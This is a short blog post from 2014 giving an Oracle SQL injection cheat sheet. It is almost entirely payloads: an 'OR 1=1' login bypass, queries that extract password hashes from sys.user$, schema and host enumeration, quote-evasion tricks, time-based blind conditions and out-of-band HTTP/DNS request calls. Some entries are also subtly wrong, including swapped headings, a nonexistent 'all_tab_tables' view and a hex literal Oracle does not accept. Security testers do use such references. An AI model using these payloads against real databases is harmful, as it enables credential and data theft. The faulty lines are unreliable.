SQL Injection 字典 - Oracle

Oracle

Default Databases

SYSTEM Available in all versions
SYSAUX Available in all versions

Comment Out Query

The following can be used to comment out the rest of the query after your injection:

-- SQL comment


Example:

      • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';

Testing Version

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Notes:

  • All SELECT statements in Oracle must contain a table.
  • dual is a dummy table which can be used for testing.

 

Database Credentials

SELECT username FROM all_users; Available on all versions
SELECT name, password from sys.user$; Privileged, <= 10g
SELECT name, spare4 from sys.user$; Privileged, <= 11g

Database Names

Current Database

SELECT name FROM v$database;
SELECT instance_name FROM v$instance
SELECT global_name FROM global_name
SELECT SYS.DATABASE_NAME FROM DUAL

User Databases

SELECT DISTINCT owner FROM all_tables;

Server Hostname

SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;

Tables and Columns

Retrieving Tables

SELECT table_name FROM all_tables;

Retrieving Columns

SELECT column_name FROM all_tab_columns;

Find Tables from Column Name

SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

Find Columns From Table Name

SELECT table_name FROM all_tab_tables WHERE column_name = 'password';

Retrieving Multiple Tables at once

SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

Avoiding the use of quotations

Unlike other RDBMS, Oracle allows table/column names to be encoded.

SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

String Concatenation

SELECT 'a'||'d'||'mi'||'n' FROM dual;

Conditional Statements

SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual

Timing

Time Delay

SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

Heavy Time Delays

AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

Privileges

SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

Out Of Band Channeling

DNS Requests

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;

Password Cracking

A Metasploit module for JTR can be found here.

posted @ 2014-07-18 20:54  w_s_xin  阅读(266)  评论(0编辑  收藏  举报